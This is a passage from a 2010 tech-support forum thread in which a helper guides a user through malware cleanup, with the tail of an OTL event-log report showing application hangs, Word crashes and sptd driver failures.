    Error - 29/10/2010 1:27:01 AM | Computer Name = MARSHALL-D40729 | Source = Application Hang | ID = 1002
    Description = Hanging application Steam.exe, version 1.0.868.88, hang module hungapp,
    version 0.0.0.0, hang address 0x00000000.

    Error - 29/10/2010 1:34:14 AM | Computer Name = MARSHALL-D40729 | Source = Application Hang | ID = 1002
    Description = Hanging application Steam.exe, version 1.0.868.88, hang module hungapp,
    version 0.0.0.0, hang address 0x00000000.

    Error - 29/10/2010 9:13:53 PM | Computer Name = MARSHALL-D40729 | Source = Application Hang | ID = 1002
    Description = Hanging application RocketDock.exe, version 0.0.0.0, hang module hungapp,
    version 0.0.0.0, hang address 0x00000000.

    Error - 29/10/2010 9:37:09 PM | Computer Name = MARSHALL-D40729 | Source = Application Hang | ID = 1002
    Description = Hanging application Steam.exe, version 1.0.868.88, hang module hungapp,
    version 0.0.0.0, hang address 0x00000000.

    Error - 30/10/2010 2:13:57 AM | Computer Name = MARSHALL-D40729 | Source = Application Hang | ID = 1002
    Description = Hanging application Steam.exe, version 1.0.868.88, hang module hungapp,
    version 0.0.0.0, hang address 0x00000000.

    [ OSession Events ]
    Error - 27/10/2010 5:35:28 AM | Computer Name = MARSHALL-D40729 | Source = Microsoft Office 12 Sessions | ID = 7001
    Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
    12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 13511
    seconds with 5880 seconds of active time. This session ended with a crash.

    Error - 27/10/2010 5:35:54 AM | Computer Name = MARSHALL-D40729 | Source = Microsoft Office 12 Sessions | ID = 7001
    Description = ID: 0, Application Name: Microsoft Office Word, Application Version:
    12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 2
    seconds with 0 seconds of active time. This session ended with a crash.

    [ System Events ]
    Error - 4/12/2010 5:48:48 AM | Computer Name = MARSHALL-D40729 | Source = sptd | ID = 262148
    Description = Driver detected an internal error in its data structures for .

    Error - 4/12/2010 6:58:48 PM | Computer Name = MARSHALL-D40729 | Source = Service Control Manager | ID = 7026
    Description = The following boot-start or system-start driver(s) failed to load:
    sptd

    Error - 4/12/2010 6:58:54 PM | Computer Name = MARSHALL-D40729 | Source = sptd | ID = 262148
    Description = Driver detected an internal error in its data structures for .

    Error - 4/12/2010 8:54:31 PM | Computer Name = MARSHALL-D40729 | Source = sptd | ID = 262148
    Description = Driver detected an internal error in its data structures for .

    Error - 4/12/2010 8:54:50 PM | Computer Name = MARSHALL-D40729 | Source = Service Control Manager | ID = 7026
    Description = The following boot-start or system-start driver(s) failed to load:
    sptd

    Error - 4/12/2010 10:38:27 PM | Computer Name = MARSHALL-D40729 | Source = Service Control Manager | ID = 7026
    Description = The following boot-start or system-start driver(s) failed to load:
    sptd

    Error - 4/12/2010 10:38:27 PM | Computer Name = MARSHALL-D40729 | Source = sptd | ID = 262148
    Description = Driver detected an internal error in its data structures for .

    Error - 4/12/2010 10:44:03 PM | Computer Name = MARSHALL-D40729 | Source = Service Control Manager | ID = 7026
    Description = The following boot-start or system-start driver(s) failed to load:
    sptd

    Error - 4/12/2010 10:44:04 PM | Computer Name = MARSHALL-D40729 | Source = sptd | ID = 262148
    Description = Driver detected an internal error in its data structures for .

    Error - 4/12/2010 10:55:45 PM | Computer Name = MARSHALL-D40729 | Source = Service Control Manager | ID = 7026
    Description = The following boot-start or system-start driver(s) failed to load:
    sptd


    < End of report >
     
  19. 2010/12/05
    crunchie

    crunchie Inactive

    Joined:
    2010/01/12
    Messages:
    982
    Likes Received:
    5
    Ok. Run it again but this time check the box to remove those entries.

    Reboot when done, then carry out the OTL directions please.
     
  20. 2010/12/05
    Cosmic Jester

    Cosmic Jester Inactive Thread Starter

    Joined:
    2010/12/04
    Messages:
    22
    Likes Received:
    0
    I am assuming that I run ESET again and check the box to remove the threats, reboot, then run OTL again?
    I didn't get it at first D: But I think I know what you mean, but I will wait for a confirmation.
     
  21. 2010/12/05
    crunchie

    crunchie Inactive

    Joined:
    2010/01/12
    Messages:
    982
    Likes Received:
    5
    I didn't see that you had run OTL already 'cos it was on the next page (for me).
     
